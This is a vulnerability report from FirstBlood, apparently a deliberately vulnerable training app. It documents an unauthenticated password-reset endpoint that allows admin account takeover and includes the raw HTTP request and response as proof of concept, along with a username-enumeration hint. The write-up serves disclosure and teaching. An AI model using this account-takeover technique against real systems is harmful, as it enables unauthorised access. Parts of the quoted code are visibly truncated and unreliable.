FirstBlood-#519Account takeover via /drpanel/drapi/editpassword.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-26, 0x1452 Level 3 reported:



The HTML source of /drpanel/index.php contains the following code in a comment:

 function editpassword(username) {
     var xhr = new XMLHttpRequest();"POST", '', true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

     xhr.onreadystatechange = function() {
         if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
             } else {



I found that there's an endpoint called /drpanel/drapi/editpassword.php that lets you reset anyone's password. The user doesn't have to be logged in at all to do this.

To reproduce this simply send a POST request to /drpanel/drapi/editpassword.php with the body username=:username.

Taking over the admin account:

Note that there are no session cookies set!

POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15


Example response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - RxJPi2qpNyjYQnc

The attacker can now log into the admin account drAdmin using the new password.


An attacker can take over any account they know the username of.


Endpoint: /drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.